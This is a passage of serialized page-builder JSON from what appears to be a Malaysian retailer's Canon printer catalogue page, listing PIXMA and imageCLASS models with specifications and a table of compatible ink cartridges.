pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e0baf05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c3f6907\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p>\\n\\n<\\/div>\\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f2ce8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a9b750\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p>\\n\\n<\\/div>\\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2fabcd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0a62d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\\n\\n<\\/div>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>First Print Out Time (A4): Approx. 6.5 sec<\\/li>\\n \\t<li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n \\t<li>Mobile Printing<\\/li>\\n<\\/ul><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dfd3898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n\\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 43ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li>\\n \\t<li>FPOT: 6.2secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 2,300 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f0eb648\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p>\\n\\n<\\/div>\\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 38ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 750 - 4,000 pages<\\/li>\\n \\t<li>FPOT: 5.5secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 900 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a7e17a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"13\\\" align=\\\"center\\\">imagePROGRAF PRO-500<\\/td>\\n<td>Maintenance Cartridge MC-20<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Blue)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Chroma Optimizer)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Matte Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Red)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY iB4170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5070<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5370<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5470<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E3170<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E410<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\",\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td 